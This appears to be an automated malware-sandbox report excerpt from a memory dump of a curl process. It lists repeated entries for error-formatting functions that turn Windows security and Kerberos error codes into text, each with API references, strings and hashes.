Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_PA_DATA
API String ID: 1435330505-2211492245
Opcode ID: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction ID: bc205068e78653cbe51c178c9f647c39228041dde09e05b0e975e942e8843f29
Opcode Fuzzy Hash: 353f13fe14f87235a997bad30c687cde4c67812a9ff5a832dee23c336d2a1b18
Instruction Fuzzy Hash: 92112A36A15A40D6E661EF20E4447DD7365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EDE9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_NO_KERB_KEY, xrefs: 000000013F31EDE9
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_NO_KERB_KEY
API String ID: 1435330505-1707302738
Opcode ID: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction ID: 97f1e369671a12aef17aad921bb5a69e1ed1db5e67ea0a10c2b7016b11cd40fe
Opcode Fuzzy Hash: 63f6afb085b1445b8bd16bc8abab2ff036b0227d7b105ce9a078973c1f8a3f0c
Instruction Fuzzy Hash: FD112A36A15A40D6E661EF20E4447DD7365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE55 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_REVOCATION_OFFLINE_C, xrefs: 000000013F31EE55
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_C
API String ID: 1435330505-3434868068
Opcode ID: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction ID: 5b91bfe5bac9d55111845c6c51cf337c6b93cc014c232ce8e0956214aa00ec39
Opcode Fuzzy Hash: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction Fuzzy Hash: D7112A36A15B40D6E661EF20E4047DD6365F788B81F81513ADA8E42B95DF3CCA8BC750

Function 000000013F31EE49 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_QOP_NOT_SUPPORTED, xrefs: 000000013F31EE49
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_QOP_NOT_SUPPORTED
API String ID: 1435330505-2000925551
Opcode ID: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction ID: a1a698c2b8e3aba8cb603268e74fe236634a536194be4ef86da22f07d9db9d03
Opcode Fuzzy Hash: e056cf3e6dc9e0495b083fa39f9abda904dc560eeaad2d8842722b571ae5303d
Instruction Fuzzy Hash: 3E112736A15B40D6E6A1FF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EE31 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_PKINIT_NAME_MISMATCH, xrefs: 000000013F31EE31
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_NAME_MISMATCH
API String ID: 1435330505-150002090
Opcode ID: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction ID: 1971574ae2b2d7988b0d484e688cb386415d7125e5a5c077b2dffdf483dd4928
Opcode Fuzzy Hash: f38405e0da77630303fafb2dff8b3ccb76a48b2bc13f3757ad187b8bdde8741f
Instruction Fuzzy Hash: 69112A36A15B40D6E661EF20E4047DD6365F788B91F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE3D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_POLICY_NLTM_ONLY, xrefs: 000000013F31EE3D
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_POLICY_NLTM_ONLY
API String ID: 1435330505-2604752562
Opcode ID: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction ID: cbfe8d523a9c4fd68e4a2738c65c7bcb4e59d2e2ca9da5af23172da0c74a740d
Opcode Fuzzy Hash: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction Fuzzy Hash: 3E112A36A15B40D6E665EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE25 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 000000013F31EE25
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_PKINIT_CLIENT_FAILURE
API String ID: 1435330505-751537933
Opcode ID: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction ID: 9553b32fec820159d9b17c7c0593c7e7cf039ceede29153b4d470fa7374ce9ce
Opcode Fuzzy Hash: 1627c26d4eb300424a7047a3f50406876f7c33a145d383bd92fc89cb502bb4a8
Instruction Fuzzy Hash: 4D112A36A15B40D6E661EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE91 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 000000013F31EE91
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_EXPIRED
API String ID: 1435330505-701404350
Opcode ID: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction ID: 8b01fa5946831b2ab69d16f196368c82e7881be4a748bedd0621605cc6d496e5
Opcode Fuzzy Hash: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction Fuzzy Hash: 9B112736A15A40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EE9D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 000000013F31EE9D
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_REVOKED
API String ID: 1435330505-2367886648
Opcode ID: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction ID: b0ace3e8bb4d88d174cf50847aa53d0e46bebb33b6e2889133c111a72f8d50ce
Opcode Fuzzy Hash: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction Fuzzy Hash: A0115A32A15A40C6E661EF20E4047DD6325F788B81F80413ADA8E42B95DF3CCA8BC700

Function 000000013F31EE85 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 000000013F31EE85
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SHUTDOWN_IN_PROGRESS
API String ID: 1435330505-1032945330
Opcode ID: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction ID: c19bd2450bf537da775e51b0cec24c34ca673410c94e128b523c3c37ab16dc3e
Opcode Fuzzy Hash: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction Fuzzy Hash: 67112736A15B40D6E6A1EF20E4147DD6365F788B81F81413ADA8E43B96DF3CCA8BC750

Function 000000013F31EE79 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_SECURITY_QOS_FAILED, xrefs: 000000013F31EE79
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECURITY_QOS_FAILED
API String ID: 1435330505-538001202
Opcode ID: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction ID: 9f29e2d1103d5802600625d29f0753bb94d996451ca1b704897c740eb9ae603f
Opcode Fuzzy Hash: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction Fuzzy Hash: 5D112736A15B40D6E6A1EF20E4047DD6365F788B81F81413ADA8E42B96DF3CCA8BC750

Function 000000013F31EE61 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 000000013F31EE61
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_KDC
API String ID: 1435330505-3944752561
Opcode ID: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction ID: f3b92ac62377d53f20889cd82cdc90665af5119e7861ba4444b0a8e817c59914
Opcode Fuzzy Hash: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction Fuzzy Hash: 8D112A36A15B40D6E661EF20E4047DD6365F788B81F81413ADA8E42B95DF3CCA8BC750

Function 000000013F31EE6D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F31F021

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

SEC_E_SECPKG_NOT_FOUND, xrefs: 000000013F31EE6D
%s - %s, xrefs: 000000013F31F059
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

